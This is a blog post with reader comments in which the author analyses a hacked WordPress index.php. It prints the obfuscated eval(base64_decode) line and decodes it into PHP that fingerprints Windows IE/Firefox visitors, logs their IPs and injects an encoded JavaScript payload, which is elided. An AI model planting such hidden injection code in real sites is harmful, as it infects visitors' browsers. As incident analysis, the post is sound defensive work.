As I wrote yesterday, someone hacked the Irreal WordPress installation causing it to inject JavaScript into pages served by the blog. Here’s a copy of the hacked index.php file:
<?php eval(base64_decode('JGlwPSRfU0VSVkVS /* elided */ );?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>
Importing that file into Emacs and using the base64-decode-region function, that first line turns out to be
<?php
eval(base64_decode('$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua
= $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip)
=== false)){ error_reporting(0);
echo(base64_decode('PHNjcmlwdD50cnl7MS1wcm90b3R5 /* elided */ ); if
($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);} }'));?>
I’m not a PHP or JavaScript programmer so I had to bootstrap my knowledge of C to figure out what’s going on. As you can see, the code checks to see if it’s running on a Windows machine that is using either Internet Explorer or Firefox and also makes a check on the file contents that I don’t understand. If those checks pass, it echos the payload onto the page. Notice that new call to base64_decode. When it’s decoded it expands to some byte-compiled JavaScript. I didn’t bother decompiling it because, as I say, I’m not a JS programmer and would only have a vague notion of what it was doing.
All of this was pretty easy to figure out once I got the index.php file into Emacs. As usual, it had all the tools I needed. I’m beginning to think that there might be something to the old joke that Emacs is not an editor, it’s an operating system.
What does “byte-compiled Javascript” mean?
Lots of interpreted languages offer byte-compilation. (Elisp would be another pertinent example.) Byte-compiled code is still interpreted, but it has been converted into a form which can be interpreted faster than the original code.
Probably in this context “byte compiled” means “minified”?
Apparently you didn’t remove the concerned code yet?
It happened once to one of my friend’s sites. Unfortunately, Google took a few weeks to remove the warning, even if he followed all the Google Webmaster Tools procedure.